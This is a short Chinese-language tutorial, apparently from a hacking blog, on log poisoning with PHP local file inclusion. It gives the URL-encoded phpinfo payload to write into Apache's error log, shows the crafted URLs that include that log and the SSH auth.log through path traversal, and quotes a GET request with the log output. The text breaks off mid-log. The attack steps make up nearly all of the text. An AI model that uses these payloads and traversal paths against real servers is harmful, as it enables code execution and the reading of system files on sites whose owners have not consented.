一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读
我们可以包含日志
在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交
http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E
这样肯定会报出错找不到页面,而一出错就被记在错误日志里了
http://xxx.com/z.php?zizzy=/home/user/www.xxx.com/logs/www-error_log
这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
--------------------
另外的包含假设SSH日志可读 如果你的HTTPD能读当前的SSH日志:
root@ubuntu:/var/log# chmod 777 auth.log
包含他
root@Ubuntu:~# GET http://5.5.5.2/lif.php?file=../../../var/log/auth.log | head
Aug 2 18:55:44 ubuntu sshd[812]: Server listening on 0.0.0.0 port 22.
Aug 2 18:55:44 ubuntu sshd[812]: Server listening on :: port 22.
Aug 2 18:55:55